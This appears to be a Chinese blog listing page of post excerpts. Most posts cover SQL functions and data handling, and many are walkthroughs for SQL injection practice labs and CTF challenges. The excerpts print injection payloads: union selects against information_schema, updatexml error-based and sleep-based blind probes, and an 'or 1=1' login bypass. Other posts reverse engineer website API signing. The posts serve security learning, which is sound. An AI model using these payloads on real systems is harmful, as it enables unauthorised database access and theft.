• 2024-09-25经典sql题(十四)炸裂函数的恢复
    下面是一个关于SELECT语句的例子,该示例展示了如何使用CONCAT_WS和COLLECT_LIST函数来处理炸裂之后学生成绩的数据。假设我们有一个名为test的表,结构如下:表结构teststudent_idstudent_nameclassscore1AliceClass1901AliceClass1851AliceClass1802BobClass2752BobC
  • 2024-09-22js逆向实战之Bitcoin浏览器交易x-apikey参数加密逻辑
    声明:本篇文章仅用于知识分享实战网址:https://www.oklink.com/zh-hans/btc/tx-list分析过程访问网址,会触发一条数据包。看它的响应内容。就是我们想要获取的内容,找到数据了。可以先尝试直接去访问该url,看能否获取数据。importrequestsurl="https://www.oklink.com/a
  • 2024-09-20数据处理与统计分析篇-day07-Pandas数据拼接与空值处理
    一.数据组合连接方式:inner:内连接(交集)left:左外(左表全集+交集)right:右外(右表全集+交集)outer:满外连接(左表全集+右表全集+交集)导包importnumpyasnpimportpandasaspdimportosimportsqlite3​os.chdir(r'D:\CodeProject\03data_pro
  • 2024-09-20Pikachu靶场-SQL注入
    Pikachu靶场数字型注入这里使用的是POST型提交的所以要用抓包工具做(1)判断回显位置语法:id=1unionselect1,2---页面已经显示出有几列了所以没测试(2)判断库名语法:id=1unionselect1,database()---(3)判断表名语法:id=1unionselect1,group_concat(t
  • 2024-09-17基于sqli-labs Less-5 sql报错注入详解
    按照之前的思路发现,是正常的'闭合的字符型,但是在联合注入0'unionselect1,2,3--+没有回显注入点,只是回显Youarein,因此无法使用联合注入,考虑使用报错注入或者盲注。考虑到本题会给出数据库的错误信息,且盲注比较麻烦,尝试使用报错注入1.报错注入函数简介1.1updatexml函数UP
  • 2024-09-12[极客大挑战 2019]LoveSQL 1
    启动靶机作者不建议使用sqlmap我们这里就进行手工注入用万能口令登录admin'or1=1#,详情见上文(https://www.cnblogs.com/m1saka1/p/18411197)登录成功获得用户名和密码,发现密码并没有卵用,只能换思路利用账号密码的回显页面进行sql注入爆破数据库由于网站自动转义,为了方
  • 2024-09-11SQL学习笔记
    SQL注入原理SQL注入原理就是跟SQL语法有关的一种攻击手段。如果在编写代码时没有对提交的参数进行严格过滤和判断,通过在客户端提交参数时拼接SQL语句,提交至服务端,服务端将拼接的SQL语句提交给数据库执行,泄露数据库中的信息并返回给服务端,再返回给客户端,从而获得信息或者执行危险
  • 2024-09-10mysql实用系列:mysql如何拼接字符串?
    在MySQL中,拼接字符串可以使用CONCAT()函数,或者使用+操作符。以下是一些基本的使用示例:使用CONCAT()函数:SELECTCONCAT('Hello','','World');--输出:HelloWorld使用+操作符:SELECT'Hello'+''+'World';--输出:HelloWorld拼接多个字符串:SEL
  • 2024-09-07mysql sql同一个字段多个行转成一个字段查询
    mysqlsql同一个字段多个行转成一个字段查询如果您想要将MySQL中同一个表的不同行的值合并到一个字段中,您可以使用GROUP_CONCAT()函数。这个函数可以将多个行的值连接起来,并且可以通过SEPARATOR关键字指定分隔符。以下是一个简单的例子,假设我们有一个名为users的表,它有一个name字
  • 2024-09-06有道翻译-解密sgin值
    constCryptoJS=require('crypto-js')//vartext="123456"//md5Text=CryptoJS.MD5(text).toString()////console.log(md5Text);////输出:e10adc3949ba59abbe56e057f20f883e//有道sginfunctionf(txt){functionh(t){//return
  • 2024-09-05mysql 常用sql
    select@name:=underlineToCamel(t.COLUMN_NAME)'列名',@type:=casewhent.DATA_TYPEin('varchar','char','text','longtext','mediumtext','mediumblob')then
  • 2024-09-02sqli-labs靶场通关攻略(51-60)
    Less-51步骤一:这关的参数是sort,输入?sort=1'--+步骤二:查看数据库?sort=1'andupdatexml(1,concat(1,(selectdatabase())),1)--+步骤三:查看表名?sort=1'andupdatexml(1,concat(1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_sche
  • 2024-09-01sqli-labs靶场(51-55)
    51关这关跟50关一样采用报错来查看Less-51/?sort=1andupdatexml(1,concat(1,(selectdatabase())),1)--+查表/Less-51/?sort=1'andupdatexml(1,concat(1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='security')),1)--+查列
  • 2024-08-30sqli-labs通关(41- )
    第四十一关1、判断闭合和列数整数闭合,共有3列2、查看数据库名?id=-1unionselect1,database() --+3、查看数据表名?id=-1unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema='security'--+4、查看users字段名
  • 2024-08-29sqli-labs靶场通关攻略(41-60)
    第四十一关联合查询爆出数据库但这关考察的时堆叠注入,我们给他注入一条数据输入id=50即可查到我们注入的数据 第四十二关看页面似曾相识,上次我们是用注册新用户然后对其他账户进行登录从而造成注入,但这次不能注册新用户了存在堆叠注入函数,所以我们可以在密码哪里
  • 2024-08-26sqli-labs靶场通关攻略(31-35关)
    第31关(")闭合)查数据库?id=")unionselect1,2,database()--+查表?id=")unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema='security'--+查列?id=")unionselect1,2,group_concat(column_nam
  • 2024-08-24sqli-labs靶场通过攻略(21~40)
    第二十一关这里用了base64编码加密进来可以看到来到在线加密把咱们的语句加密一下加密前:admin'andupdatexml(1,concat('~',(selectdatabase()),'~'),1)and'这是加密后的语句YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSksJ34nKSwxKSBhb
  • 2024-08-22sqlilabs less21-25关手工注入
    第21关一.登录页面二.BurpSuite抓包,进入重放器三.查询数据库先进行编码')andupdatexml(1,concat(1,database()),1)#四.查表,先进行编码')andupdatexml(1,concat(1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='secur
  • 2024-08-22sqli-labs靶场通关攻略 16-20
    主页有sqli-labs靶场通关攻略1-15第十六关less-16​步骤一:判断闭合方式为admin") and1=1#​步骤二:判断列数admin")orderby2 #数据正常admin")orderby3#数据报错得出结果2列​​步骤三:判断数据库长度1")orlength(database())=8#​说明数据裤字符
  • 2024-08-21sqlilabs less16-20关手工注入
    第16关一.判断闭合方式闭合方式点“)admin")and1=1#二.判断数据库长度admin")andif(length(database())>7,0,sleep(5))#页面无延迟 admin")andif(length(database())>8,0,sleep(5))# 页面有延迟说明数据库长度为8三.判断数据库的第一个字符admin")and
  • 2024-08-19Nssctf [SWPUCTF 2021 新生赛]error
    进入之后是一个搜索框,里面叫你传一个id值,先看一看网页代码,发现一端后端数据库代码,说明是报错注入   extractValue()报错注入先进行字段判断,使用"1'groupby1#"来判断1'groupby1#正常回显 出错回显 说明有三个字段,接着进行数据库名的爆破1'unionsel
  • 2024-08-14CTFHub~SQL注入超简单详细教程
    0x01整数型注入#本题告诉我们是整数型,所以就很容易了#判断字段数量1orderby2#判断回显点-1unionselect1,2#查询全部数据库名-1unionselect1,group_concat(schema_name)frominformation_schema.schemata#判断数据库中的表名-1unionselec
  • 2024-08-11sqli-labs漏洞靶场~SQL注入(全网最全详解)
    #sqli-labs靶场适合于初学sql注入的新手,它包含了许多的场景和模式为练习者提供良好的练习平台,以下这些语句搞懂我们做靶场就如鱼得水,非常自信的可以完成。查询当前数据库版本:selectversion();●查询当前数据库:selectdatabase();●查询当前路径:select@@basedir;●
  • 2024-08-11豆瓣短评榜单短评下载
    豆瓣短评榜单短评下载创建时间:2024-08-07一、完整代码importrequestsfromlxmlimportetreedefget_html(main_url):header={'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/125.0.0.0Safar
  • 2024-08-08Sqli-labs-master 1-10关
    SQL注入基本语句判断有多少列orderby4---判断数据显示点unionselect1,2,3---显示出登录用户和数据库名unionselect1,user(),database()---查看数据库有哪些表unionselect1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable